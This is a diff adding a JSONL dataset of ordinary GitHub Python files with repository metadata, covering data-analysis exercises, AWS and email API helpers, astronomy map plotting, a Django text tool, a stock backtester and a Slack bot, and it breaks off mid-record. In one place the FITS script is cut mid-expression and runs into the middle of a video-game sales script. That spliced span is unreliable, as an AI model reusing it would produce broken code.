diff --git "a/5357.jsonl" "b/5357.jsonl" new file mode 100644--- /dev/null +++ "b/5357.jsonl" @@ -0,0 +1,905 @@ +{"seq_id":"39099754216","text":"#Crie um programa que utilize o NumPy para calcular a média de vendas nos primeiros 10 dias \n#e verificar se houve algum dia em que as vendas foram maiores que 1000.\n\nimport numpy as np\n\nvendas = []\n\nfor i in range(10):\n valor_vendas = float(input(f'Qual o valor das vendas de hoje {i+1}: '))\n vendas.append(valor_vendas)\n\n\nvendas = np.array(vendas)\nmedia_vendas = np.mean(vendas[:10])\n\nmedia_acima_mil = vendas[vendas > 1000]\n\nprint(vendas)\nprint(media_vendas)\nprint(media_acima_mil)\n\n \n","repo_name":"Palomafreiire/AnaliseDeDados","sub_path":"aula 7/exercicioBR4.py","file_name":"exercicioBR4.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74025665474","text":"\nimport boto3\nfrom botocore.exceptions import ClientError\nimport logging\n\nclass AWSUtils(object):\n\n def __init__(self, id, key):\n\n self.id = id\n self.key = key\n\n def s3_client(self) :\n \n # try:\n client_s3 = boto3.client(\n 's3',\n aws_access_key_id = self.id,\n aws_secret_access_key = self.key,\n )\n\n # except ClientError as e:\n # logging.error(e)\n\n return client_s3\n\n @classmethod\n def ssm_client(cls, id, key, region) :\n\n cls.id = id\n cls.key = key\n cls.region = region\n\n client_ssm = boto3.client(\n 'ssm',\n aws_access_key_id = cls.id,\n aws_secret_access_key = cls.key,\n region_name = cls.region\n )\n\n return client_ssm","repo_name":"sof2000/python-cassandra-cli","sub_path":"python_cassandra_cli/aws_utils.py","file_name":"aws_utils.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42759703658","text":"import fitsio as fits\nimport numpy as np\nimport glob\nfrom tqdm import tqdm\nimport os\nfrom scipy.ndimage.filters import maximum_filter1d\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-i', '--input')\nargs = parser.parse_args()\n\nindir = os.path.join(args.input)\noutdir = os.path.join('processed', indir)\nos.makedirs(outdir, exist_ok=True)\nfiles = glob.glob(os.path.join(indir,'*.fits'))\n\nwindow = 50\nmax_len = 400\n\nfor filename in tqdm(files):\n try:\n data = fits.read(filename, ext=None)\n except:\n continue\n data = data.astype([(x, '= 2000]\r\n\r\n#Print the games DataFrame\r\n#print(games.loc[:, \"Platform\":\"Year_of_Release\"])\r\n\r\n#Change style\r\nsns.set_style(\"whitegrid\")\r\n\r\n#A variable for the age ratings in order\r\nratings_order = [\"E\", \"E10+\", \"T\", \"M\", \"AO\", \"RP\"]\r\n\r\n#Plot global sales by age rating\r\nage = sns.catplot(data = games,\r\n y = \"Global_Sales\",\r\n x = \"Rating\",\r\n kind = \"bar\",\r\n order = ratings_order)\r\n\r\n#Annotate the plot\r\nage.fig.suptitle(\"Sales of Each Age Rating Group\")\r\nage.set(xlabel = \"Age Ratings\",\r\n ylabel = \"Sales in Millions\")\r\n\r\n#Save the global sales plot\r\nage.savefig(\"Age_Global_Sales.png\")\r\n\r\n#Create a 2x2 subplot\r\nfig, ax = plt.subplots(2, 2, figsize = (8, 9.5))\r\n\r\n#A function to plot the sales by region\r\ndef plot_sales(axis, sales, colour, country):\r\n sns.barplot(ax = axis,\r\n data = games,\r\n x = \"Rating\",\r\n y = sales,\r\n estimator = sum,\r\n order = ratings_order,\r\n color = colour,\r\n ci = None)\r\n axis.set_xlabel(\"Age Rating\")\r\n axis.set_ylabel(\"Sales in Millions\")\r\n axis.set_title(\"Sales in \" + country, color = colour)\r\n\r\n#Ploting the regional sales\r\nplot_sales(ax[0, 0], \"NA_Sales\", \"red\", \"North America\")\r\nplot_sales(ax[0, 1], \"EU_Sales\", \"blue\", \"Europe\")\r\nplot_sales(ax[1, 0], \"JP_Sales\", \"green\", \"Japan\")\r\nplot_sales(ax[1, 1], \"Other_Sales\", \"purple\", \"Other Countries\")\r\n\r\n#Save regional sales figure\r\nfig.savefig(\"Sales by Region.png\")\r\n\r\n#Convert the User Score column to a float\r\ngames[\"User_Score\"] = games[\"User_Score\"].astype(float)\r\n\r\n#Create plot to compare user vs critic score\r\nfig2, ax2 = plt.subplots(1, 2, figsize = (12, 6))\r\n\r\n#Create regression plots for user vs critic score\r\n#Plot User scores vs sales\r\nsns.regplot(ax = ax2[0],\r\n data = games,\r\n x = \"User_Score\",\r\n y = \"Global_Sales\",\r\n scatter_kws = {\"color\":\"red\", \"alpha\":0.2},\r\n line_kws = {\"color\":\"black\", \"alpha\":1})\r\nax2[0].set_xlabel(\"Average User Scores by Metacritic Subscribers\")\r\nax2[0].set_ylabel(\"Sales in Millions\")\r\n#Plot critic scores vs sales\r\nsns.regplot(ax = ax2[1],\r\n data = games,\r\n x = \"Critic_Score\",\r\n y = \"Global_Sales\",\r\n scatter_kws = {\"color\":\"green\", \"alpha\":0.2},\r\n line_kws = {\"color\":\"black\", \"alpha\":1})\r\nax2[1].set_xlabel(\"Average Score on Metacritic by Professional Critics\")\r\nax2[1].set_ylabel(\"Sales in Millions\")\r\n#Add titles\r\nfig2.suptitle(\"How Sales are Affected by User Scores vs Critic Scores\")\r\n\r\n#Save the sales vs scores graph\r\nfig2.savefig(\"Critic v User score\")\r\n\r\n#Create separate dataframes for individual genres\r\nshooter = games[games[\"Genre\"] == \"Shooter\"]\r\nplatformer = games[games[\"Genre\"] == \"Platform\"]\r\nsport = games[games[\"Genre\"] == \"Sports\"]\r\nsim = games[games[\"Genre\"] == \"Simulation\"]\r\n#Merge the different genre dataframes\r\nframes = [shooter, platformer, sport, sim]\r\ngenre_df = pd.concat(frames)\r\n\r\n#plot a line plot for the genres\r\ngenre_graph = sns.catplot(data = genre_df,\r\n x = \"Year_of_Release\",\r\n y = \"Global_Sales\",\r\n kind = \"point\",\r\n ci = None,\r\n hue = \"Genre\",\r\n alpha = 0.8,\r\n estimator = sum)\r\n\r\ngenre_graph.fig.suptitle(\"Sales in Various Genres from 2000-2016\")\r\ngenre_graph.set(xlabel = \"Year of Release\",\r\n ylabel = \"Average Sales of Games in Millions\")\r\ngenre_graph.set_xticklabels(rotation = 45)\r\n\r\n#Save the genre sales graph\r\ngenre_graph.savefig(\"Sales by Genre.png\")\r\n\r\n#Display plots\r\nplt.show()","repo_name":"jjcondon001/UCDPA_JamesCondon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40110656091","text":"# This file is created by Rahul Gupta\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request, 'index.html')\n\ndef textanalyzed(request):\n textareatext = request.POST.get('entertext', 'default')\n # print(textareatext)\n removepun = request.POST.get('removepun', 'off')\n # print(removepun)\n lowercase = request.POST.get('lowercase', 'off')\n # print(lowercase)\n uppercase = request.POST.get('uppercase', 'off')\n # print(uppercase)\n charcount = request.POST.get('charcount', 'off')\n # print(charcount)\n wordcount = request.POST.get('wordcount', 'off')\n # print(wordcount)\n sentencecount = request.POST.get('sentencecount', 'off')\n # print(sentencecount)\n extraspaceremove = request.POST.get('extraspaceremove', 'off')\n # print(extraspaceremove)\n newlineremove = request.POST.get('newlineremove', 'off')\n # print(newlineremove)\n numberremove = request.POST.get('numberremove','off')\n # print(numberremove)\n\n if(removepun == 'on'):\n punctuation = '''\n !()-[]{};:'\"\\,<>./?@#$%^&*_~\n '''\n analyzed = \"\"\n for i in textareatext:\n if i not in punctuation:\n analyzed = analyzed + i\n printtext = {'purpose':'Removed Punctuation', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html',printtext)\n \n if(lowercase == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = analyzed + i.lower()\n printtext = {'purpose':'All Letter lowercase','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if (uppercase == 'on'):\n analyzed = \"\" \n for i in textareatext:\n analyzed = analyzed + i.upper()\n printtext = {'purpose':'Upper Case Letter','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if(charcount == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = len(textareatext)\n printtext={'purpose':'Count the Character','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if(wordcount == 'on'):\n analyzed = \"\"\n for i in textareatext:\n analyzed = len(textareatext.split())\n printtext = {'purpose':'Count the Word', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n \n if(sentencecount =='on'):\n analyzed = \"\"\n print(textareatext)\n for i in textareatext:\n analyzed1 = len(textareatext.split('.'))\n analyzed1=analyzed1-1\n analyzed2 = len(textareatext.split('?'))\n analyzed2=analyzed2-1\n analyzed3 = len(textareatext.split('!'))\n analyzed3=analyzed3-1\n analyzed = analyzed1 + analyzed2 + analyzed3\n printtext = {'purpose':'Count the sentence','analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n\n if extraspaceremove == 'on':\n analyzed=\"\"\n for index, i in enumerate(textareatext):\n if not(textareatext[index]==\" \" and textareatext[index+1]==\" \"):\n analyzed = analyzed + i\n printtext = {'purpose':'Removed extra space', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext)\n \n if newlineremove == 'on':\n analyzed=\"\"\n for i in textareatext:\n if i !='\\n':\n analyzed = analyzed + i\n printtext = {'purpose':'Removed new line', 'analyzed_text':analyzed}\n textareatext=analyzed\n # return render(request, 'textanalyzed.html', printtext) \n\n if (numberremove == \"on\"):\n analyzed = \"\"\n numbers = '0123456789'\n\n for i in textareatext:\n if i not in numbers:\n analyzed = analyzed + i\n \n printtext = {'purpose': 'Removed Numbers', 'analyzed_text': analyzed}\n textareatext = analyzed\n \n if(removepun!=\"on\" and lowercase!=\"on\" and uppercase!=\"on\" and charcount!=\"on\" and wordcount!=\"on\" and sentencecount!=\"on\" and extraspaceremove!=\"on\" and newlineremove!=\"on\" and numberremove!=\"on\"):\n return HttpResponse(\"Error\")\n\n return render(request, 'textanalyzed.html', printtext)\n\n\ndef about(request):\n return render(request, 'about.html')\n\ndef contact(request):\n return render(request, 'contact.html')","repo_name":"rahulgupta020/TextAnalyzer","sub_path":"TextAnalyze/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18123327765","text":"import os\nfrom flask import Flask,render_template,request,send_file\nfrom so import get_so_jobs\nfrom rm import get_rm_jobs\nfrom we import get_we_jobs\nfrom save import save_to_file\n\nos.system('clear')\n\napp = Flask(\"JobScrapper\")\n\ndb={}\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/search\")\ndef search():\n term = request.args.get('term')\n if term:\n term = term.lower()\n fromDB = db.get(term)\n if fromDB:\n jobs = fromDB\n else:\n so_jobs = get_so_jobs(term)\n we_jobs = get_we_jobs(term)\n rm_jobs = get_rm_jobs(term)\n jobs = so_jobs + we_jobs + rm_jobs\n db[term] = jobs\n else:\n return redirect(\"/\")\n return render_template(\"search.html\",term = term, resultNum = len(jobs), jobs=jobs)\n\n@app.route(\"/export\")\ndef export():\n try:\n term = request.args.get('term')\n if not term:\n raise Exception()\n term = term.lower()\n jobs = db.get(term)\n if not jobs:\n raise Exception()\n save_to_file(jobs,term)\n return send_file(f\"{term}.csv\", mimetype=\"text/csv\",attachment_filename=f\"{term}.csv\", as_attachment=True)\n except:\n return redirect(\"/\")\n \n \napp.run(host = \"0.0.0.0\")\n","repo_name":"1eq0/JobScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18743929659","text":"import healpy as hp\nimport cosmoglobe\nimport astropy.units as u\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nw = 5\nf = {\"rlabel\": 6, \"llabel\": 6}\n\nf = 12\n\n\ndef mylabel(rlabel, fontsize):\n ax = plt.gca()\n plt.text(\n 0.025,\n 1.05,\n rlabel,\n ha=\"left\",\n va=\"center\",\n fontsize=fontsize,\n transform=ax.transAxes,\n )\n\n\ntry:\n d_100_s = hp.read_map(\"npipe_100_2deg.fits\", field=(0, 1, 2))\nexcept FileNotFoundError:\n d_100 = hp.read_map(\n \"/mn/stornext/d16/cmbco/ola/npipe/freqmaps/npipe6v20_100_map_K.fits\",\n field=(0, 1, 2),\n )\n d_100_s = 1e6 * hp.ud_grade(hp.smoothing(d_100, fwhm=2 * np.pi / 180), 512)\n hp.write_map(\"npipe_100_2deg.fits\", d_100_s)\n\n\nDIR = \"/mn/stornext/d16/www_cmb/dwatts/v0\"\nd_W1 = hp.read_map(f\"{DIR}/BP_090-WMAP_W1_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W2 = hp.read_map(f\"{DIR}/BP_090-WMAP_W2_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W3 = hp.read_map(f\"{DIR}/BP_090-WMAP_W3_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W4 = hp.read_map(f\"{DIR}/BP_090-WMAP_W4_IQU_n0512_v0.fits\", field=(0, 1, 2, 6, 7, 8))\nd_W = (\n d_W1[:3] / d_W1[3:] ** 2\n + d_W2[:3] / d_W2[3:] ** 2\n + d_W3[:3] / d_W3[3:] ** 2\n + d_W4[:3] / d_W4[3:] ** 2\n) / (1 / d_W1[3:] ** 2 + 1 / d_W2[3:] ** 2 + 1 / d_W3[3:] ** 2 + 1 / d_W4[3:] ** 2)\n\n\nd_W_s = hp.smoothing(d_W, fwhm=2 * np.pi / 180)\nd_W_s = 1e3 * d_W_s\n\nd_W_orig = hp.read_map(\n \"/mn/stornext/d16/cmbco/ola/wmap/freq_maps/wmap_band_iqusmap_r9_9yr_W_v5.fits\",\n field=(0, 1, 2),\n)\nd_W_o_s = 1e3 * hp.smoothing(d_W_orig, fwhm=2 * np.pi / 180)\n\ncosmoglobe.standalone_colorbar(\n \"planck\", ticks=[-10, 0, 10], unit=r\"$\\mathrm{\\mu K}$\", extend=\"both\"\n)\nplt.savefig(\"cbar.png\", bbox_inches=\"tight\", dpi=300)\n\ncosmoglobe.plot(-d_100_s + d_W_o_s, sig=1, min=-10, max=10, cbar=False, width=w)\nmylabel(\"$\\mathit{WMAP9}-\\mathit{Planck}\\ 100\\,\\mathrm{GHz}$\", f)\nplt.savefig(\"diff_orig.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(-d_100_s + d_W_s, sig=1, min=-10, max=10, width=w, cbar=False)\nmylabel(r\"$\\mathrm{Watts\\ et\\ al.}-\\mathit{Planck}\\ 100\\,\\mathrm{GHz}$\", f)\nplt.savefig(\"diff_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_W_s, sig=1, min=-10, max=10, unit=r\"$\\mathrm{\\mu K}$\", cbar=False, width=w\n)\nmylabel(r\"$\\mathrm{Watts\\ et\\ al.}$\", f)\nplt.savefig(\"W_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_W_o_s,\n sig=1,\n min=-10,\n max=10,\n unit=r\"$\\mathrm{\\mu K}$\",\n cbar=False,\n width=w,\n llabel=r\"\\mathit{WMAP9}\",\n)\nplt.savefig(\"W_WMAP_cg.png\", bbox_inches=\"tight\", dpi=300)\ncosmoglobe.plot(\n d_100_s,\n sig=1,\n min=-10,\n max=10,\n unit=r\"$\\mathrm{\\mu K}$\",\n cbar=True,\n width=w,\n llabel=r\"\\mathit{Planck}\\ 100\\,\\mathrm{GHz}\",\n)\nplt.savefig(\"npipe_100.png\", bbox_inches=\"tight\", dpi=300)\n","repo_name":"Cosmoglobe/Commander","sub_path":"commander3/todscripts/wmap/presentation_figures/comp_W_100.py","file_name":"comp_W_100.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"4304114637","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom sendcloud import APIBaseClass\n\n\nclass SendCloudTemplate(APIBaseClass):\n\n def __init__(self, invoke_name, fail_silently=False, *args, **kwargs):\n _edm_user = kwargs.pop('edm_user', None)\n self.invoke_name = invoke_name\n try:\n self._edm_user = _edm_user or getattr(settings, 'MAIL_EDM_USER')\n except AttributeError:\n if fail_silently:\n self._edm_user = None\n else:\n raise\n\n self.get_url = 'http://sendcloud.sohu.com/webapi/template.get.json'\n self.add_url = 'http://sendcloud.sohu.com/webapi/template.add.json'\n self.update_url = 'http://sendcloud.sohu.com/webapi/template.update.json'\n self.send_url = 'http://sendcloud.sohu.com/webapi/mail.send_template.json'\n self.delete_url = 'http://sendcloud.sohu.com/webapi/template.delete.json'\n super(SendCloudTemplate, self).__init__(*args, **kwargs)\n\n @property\n def edm_user(self):\n return self._edm_user\n\n def get_or_create(self, **kwargs):\n if not self.get_status():\n self.add(**kwargs)\n\n def update_or_create(self, **kwargs):\n if not self.get_status():\n self.add(**kwargs)\n else:\n self.update(**kwargs)\n\n def get_status(self):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name\n }\n\n res = self.post_api(self.get_url, data)\n\n if len(res['templateList']) == 0:\n return False\n try:\n template_info = res['templateList'][0]\n return template_info['is_verify']\n except Exception:\n if not self.fail_silently:\n raise\n return False\n\n def add(self, name, html, subject, email_type=1):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n 'name': name,\n 'html': html,\n 'subject': subject,\n 'email_type': email_type\n }\n return self.post_api(self.add_url, data)\n\n def update(self, name, html, subject, email_type=1):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n 'name': name,\n 'html': html,\n 'subject': subject,\n 'email_type': email_type\n }\n return self.post_api(self.update_url, data)\n\n def delete(self):\n data = {\n 'api_user': self.api_user,\n 'api_key': self.api_key,\n 'invoke_name': self.invoke_name,\n }\n res = self.post_api(self.delete_url, data)\n return res\n\n def send_to_list(self, subject, from_mail, from_name, to):\n data = {\n 'api_user': self.edm_user,\n 'api_key': self.api_key,\n 'use_maillist': 'true',\n 'resp_email_id': 'true',\n 'template_invoke_name': self.invoke_name,\n 'subject': subject,\n 'to': to,\n \"from\": from_mail,\n \"mail_from\": from_mail,\n \"fromname\": from_name,\n }\n return self.post_api(self.send_url, data)\n","repo_name":"guoku/django-sendcloud","sub_path":"sendcloud/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"15481470760","text":"import numpy as np\nimport pandas as pd\nimport quandl # Necessary for obtaining financial data easily\nimport json\nimport time\nfrom yahoofinancials import YahooFinancials as YF\nimport time\nimport pandas as pd\n# from pandas_datareader import data\nimport os\nimport pickle\nfrom tqdm import tqdm\nimport scipy.stats as sp\nfrom backtest import Strategy, Portfolio\nimport os\nfrom fbprophet import Prophet\nfrom utils import *\n\n\nclass RandomStrategy(Strategy):\n \"\"\"Derives from Strategy to produce a set of signals that\n are randomly generated long/shorts. Clearly a nonsensical\n strategy, but perfectly acceptable for demonstrating the\n backtesting infrastructure!\"\"\"\n\n def __init__(self, tickers, bars, strategy):\n \"\"\"Requires the symbol ticker and the pandas DataFrame of bars\"\"\"\n self.tickers = tickers\n self.bars = bars\n self.strategy = strategy\n\n def genSignals(self):\n # uses the first stock in stocks to set the index for the signals df\n signals = pd.DataFrame(index=self.bars[next(iter(self.bars))].index)\n # for stock in list(self.bars):\n # signals[stock] = self.strategy(self.bars[stock])\n # #signals[stock] = 1 #np.sign(np.random.randn(len(signals)))\n # signals[stock][0:5] = 0.0\n for strat in self.strategy:\n if (strat['name'] == 'MACDStrat'):\n print('MACDStrat')\n signals = self.MACDStrat(\n signals, strat['params']['short'], strat['params']['long'])\n elif (strat['name'] == 'single'):\n print('single')\n signals = self.singleStockStrat(\n signals, strat['params']['ticker'])\n elif (strat['name'] == 'weighted'):\n print(strat['params'].weights)\n signals = self.weightedStrat(\n signals, strat['params'].weights)\n return signals\n\n def MACDStrat(self, signals, short, long):\n self.bars = addMACD(self.bars, short, long)\n for stock in list(self.bars):\n signal = np.sign(self.bars[stock]['macd_signal'])\n signals[stock] = signal\n return signals\n\n def singleStockStrat(self, signals, ticker):\n stocks = self.bars\n for stock in list(stocks):\n if (stock == ticker):\n signals[stock] = 1\n else:\n signals[stock] = 0\n # signals[stock] = 1 #np.sign(np.random.randn(len(signals)))\n signals[stock][0:1] = 0.0\n return signals\n\n def weightedStrat(self, signals, weights):\n # for i in range(0, len(list(self.bars.keys()))):\n # symbol = list(self.bars.keys())[i]\n # signals[symbol] = weights[i]\n # signals[symbol][0:1] = 0.0\n print(weights)\n for stock, weight in weights.items():\n signals[stock] = weight\n signals[stock][0:1] = 0.0\n return signals\n\n\nclass MyPortfolio(Portfolio):\n \"\"\"Inherits Portfolio to create a system that purchases 100 units of \n a particular symbol upon a long/short signal, assuming the market \n open price of a bar.\n\n In addition, there are zero transaction costs and cash can be immediately \n borrowed for shorting (no margin posting or interest requirements). \n\n Requires:\n symbol - A stock symbol which forms the basis of the portfolio.\n bars - A DataFrame of bars for a symbol set.\n signals - A pandas DataFrame of signals (1, 0, -1) for each symbol.\n initial_capital - The amount in cash at the start of the portfolio.\"\"\"\n\n def __init__(self, tickers, bars, signals, initial_capital=1000):\n self.tickers = tickers\n self.bars = bars\n self.signals = signals\n self.initial_capital = float(initial_capital)\n self.positions = signals\n self.forecast = {}\n self.lastDate = ''\n\n def generate_positions(self):\n for stock in list(self.tickers):\n self.signals[stock+\"_position\"] = 1*self.signals[stock]\n self.signals[stock +\n '_pos_diff'] = self.signals[stock+\"_position\"].diff()\n return self.signals\n\n def forecast_positions(self):\n for stock in list(self.tickers):\n self.signals[stock+\"_position\"] = 1*self.signals[stock]\n self.signals[stock +\n '_pos_diff'] = self.signals[stock+\"_position\"].diff()\n return self.signals\n\n def backtest_portfolio(self):\n holdings_col = []\n for stock in list(self.tickers):\n #positions[stock+\"_price\"] = stocks[stock].Open\n holdings_col.append(stock+\"_holdings\")\n self.positions[stock+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock].Open)\n self.positions[stock+\"_holdings\"] = self.bars[stock].Open * \\\n self.positions[stock+'_position']\n self.positions[stock+'_open'] = self.bars[stock].Open\n self.positions[stock+'_close'] = self.bars[stock].Close\n\n # get total holdings, and cash flow\n self.positions['holdings'] = self.positions[holdings_col].sum(axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in holdings_col]].sum(axis=1)\n self.positions['cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['total'] = self.positions['cash'] + \\\n self.positions['holdings']\n self.positions['returns'] = self.positions['total'].pct_change()\n self.positions['date'] = self.positions.index.strftime(\"%m/%d/%Y\")\n self.positions = self.positions.fillna(0)\n return self.positions\n\n def backtest_forecast(self):\n holdings_col = []\n upper_holdings = []\n lower_holdings = []\n for stock in list(self.tickers):\n #positions[stock+\"_price\"] = stocks[stock].Open\n holdings_col.append(stock+\"_holdings\")\n self.positions[stock+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat'])\n self.positions[stock+\"_holdings\"] = self.bars[stock]['yhat'] * \\\n self.positions[stock+'_position']\n \n # self.positions[stock+'_open'] = self.bars[stock]['yhat_upper']\n # self.positions[stock+'_close'] = self.bars[stock]['yhat_upper']\n\n # upper\n col_name = stock + '_yhat_upper'\n upper_holdings.append(col_name+\"_holdings\")\n self.positions[col_name+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat_upper'])\n self.positions[col_name+\"_holdings\"] = self.bars[stock]['yhat_upper'] * \\\n self.positions[stock+'_position']\n self.positions[col_name] = self.bars[stock]['yhat_upper']\n\n # lower\n col_name = stock + '_yhat_lower'\n lower_holdings.append(col_name+\"_holdings\")\n self.positions[col_name+'_cash'] = (\n self.positions[stock+'_pos_diff'] * self.bars[stock]['yhat_lower'])\n self.positions[col_name+\"_holdings\"] = self.bars[stock]['yhat_lower'] * \\\n self.positions[stock+'_position']\n self.positions[col_name] = self.bars[stock]['yhat_lower']\n\n # get total holdings, and cash flow\n self.positions['forecasted_holdings'] = self.positions[holdings_col].sum(axis=1)\n self.positions['forecasted_cash_diff'] = self.positions[[x.replace('_holdings', '_cash') for x in holdings_col]].sum(axis=1)\n self.positions['forecasted_cash'] = self.initial_capital - \\\n self.positions['forecasted_cash_diff'].cumsum()\n self.positions['forecasted_total'] = self.positions['forecasted_cash'] + \\\n self.positions['forecasted_holdings']\n self.positions['forecasted_returns'] = self.positions['forecasted_total'].pct_change()\n self.positions['date'] = self.positions.index.strftime(\"%m/%d/%Y\")\n\n # upper\n self.positions['upper_holdings'] = self.positions[upper_holdings].sum(\n axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in upper_holdings]].sum(axis=1)\n self.positions['upper_cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['upper_total'] = self.positions['upper_cash'] + \\\n self.positions['upper_holdings']\n self.positions['upper_returns'] = self.positions['upper_total'].pct_change()\n\n # lower\n self.positions['lower_holdings'] = self.positions[lower_holdings].sum(\n axis=1)\n self.positions['cash_diff'] = self.positions[[\n x.replace('_holdings', '_cash') for x in lower_holdings]].sum(axis=1)\n self.positions['lower_cash'] = self.initial_capital - \\\n self.positions['cash_diff'].cumsum()\n self.positions['lower_total'] = self.positions['lower_cash'] + \\\n self.positions['lower_holdings']\n self.positions['lower_returns'] = self.positions['lower_total'].pct_change()\n\n self.positions = self.positions.fillna(0)\n\n return self.positions\n\n def forecast_portfolio(self):\n col_name = 'Open'\n for stock in list(self.bars):\n df = self.prophetDf(self.bars[stock], col_name)\n prophet, forecast = self.createForecast(df)\n self.bars[stock] = self.bars[stock].rename(columns={\n 'y': col_name,\n 'ds':'Date'\n })\n # forecast = forecast.rename(columns={\n # 'yhat':'Open',\n\n # })\n\n # forecast = forecast[cols_wanted][forecast.index > '2021-03-12'].fillna(0)\n # self.forecast[stock] = pd.concat([self.bars[stock],forecast], axis=1)\n\n #self.forecast[stock] = self.forecast[stock].fillna(0)\n cols_wanted = ['yhat', 'yhat_upper', 'yhat_lower']\n last_date = self.bars[stock].index[-2]\n self.forecast[stock] = forecast[cols_wanted][forecast.index > last_date].fillna(0)\n return self.forecast\n\n def createForecast(self, df):\n corona_prophet = Prophet(\n changepoint_prior_scale=0.15, weekly_seasonality=False, yearly_seasonality=False)\n corona_prophet.add_seasonality(\n 'self_define_cycle', period=8, fourier_order=8, mode='additive')\n corona_prophet.fit(df)\n # Make a future dataframe for 6 months\n corona_forecast = corona_prophet.make_future_dataframe(\n periods=20, freq='D')\n # Make predictions\n corona_forecast = corona_prophet.predict(corona_forecast)\n corona_forecast.index = corona_forecast['ds']\n corona_forecast.drop(['ds'], axis=1, inplace=True)\n #corona_forecast = corona_forecast.rename(columns={'yhat':'Open'})\n return corona_prophet, corona_forecast\n\n def prophetDf(self, closeDf, col_name):\n closeDf.rename(columns={\"Date\": \"ds\", col_name: \"y\"}, inplace=True)\n closeDf['ds'] = closeDf.index\n return closeDf\n","repo_name":"lucasdmoyer/two-dolla","sub_path":"backtester.py","file_name":"backtester.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9816777297","text":"import random\nfrom math import gcd as bltin_gcd\nfrom textwrap import wrap\n\ndef isPrime(n):\n if n==2 or n==3: return True\n if n%2==0 or n<2: return False\n for i in range(3, int(n**0.5)+1, 2):\n if n%i==0:\n return False\n return True\n\ndef isCoprime(a, b):\n return bltin_gcd(a, b) == 1\n\ndef getE(phi):\n possiblyNumber = random.randint(3, phi)\n while not isPrime(possiblyNumber) and not isCoprime(possiblyNumber, phi):\n possiblyNumber = random.randint(3, phi)\n return possiblyNumber\n\ndef getD(e,phi):\n possiblyNumber = 3\n while (e*possiblyNumber % phi) != 1 and possiblyNumber 50:\n return response[1]\n else:\n return f'No suitable match for: \"{usr_txt}\". Please rewrite your request.'\n\n## \n def _get_formatted_id(self, usr_txt):\n puncts = \"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\n for wrd in usr_txt.split(): \n for p in puncts:\n wrd = wrd.replace(p, '')\n\n if not wrd.isalpha():\n return wrd.upper()\n else:\n return f\"No Rally IDs found in: {usr_txt}\" \n##\n def _handle_command(self, user, usr_txt):\n response = '<@' + user + '> '\n _CMD = self._find_command(usr_txt)\n print(_CMD)\n _ID = self._get_formatted_id(usr_txt)\n print(_ID)\n\n if usr_txt in self.hidden_commands:\n response += self.hidden_commands[usr_txt]()\n elif _CMD in self.commands:\n if _CMD in ('estimate'):\n response += self.commands[_CMD](_ID, 'PE')\n elif _CMD in ('name'):\n response += self.commands[_CMD](_ID, 'N')\n elif _CMD in ('owner'):\n response += self.commands[_CMD](_ID, 'O')\n elif _CMD in ('state'):\n response += self.commands[_CMD](_ID, 'KSA')\n else:\n response += 